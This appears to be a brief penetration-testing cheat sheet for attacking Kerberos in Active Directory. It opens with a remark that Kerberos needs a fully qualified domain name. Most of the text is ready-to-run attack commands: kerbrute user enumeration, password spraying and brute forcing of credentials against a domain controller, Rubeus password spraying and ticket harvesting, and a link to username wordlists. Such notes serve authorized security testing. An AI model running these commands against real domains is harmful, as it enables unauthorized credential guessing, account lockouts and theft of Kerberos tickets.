<aside> 💡
Kerberos communication requires a full qualified name (FQDN) for performing actions. If you try to access a machine by the IP address. It’ll use NTLM not Kerberos.
</aside>
kerbrute userenum --dc $DC_IP --domain $DOMAIN $USERNAME_LIST
kerbrute userenum --dc $DC_IP --domain $DOMAIN wook.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
# credslist contains [user]:[pass] on each line
kerbrute passwordspray --dc $DC_IP --domain $DOMAIN $USERNAME_LIST $PWD
kerbrute bruteuser --dc $DC_IP --domain [domain] [passlist] [user]
kerbrute bruteforce --dc [DC_IP] --domain [domain] [credslist]
# password spraying
rubeus.exe brute /password:[password] /noticket
# harvesting tickets
rubeus.exe harvest /interval:30
# wordlists
<https://github.com/insidetrust/statistically-likely-usernames>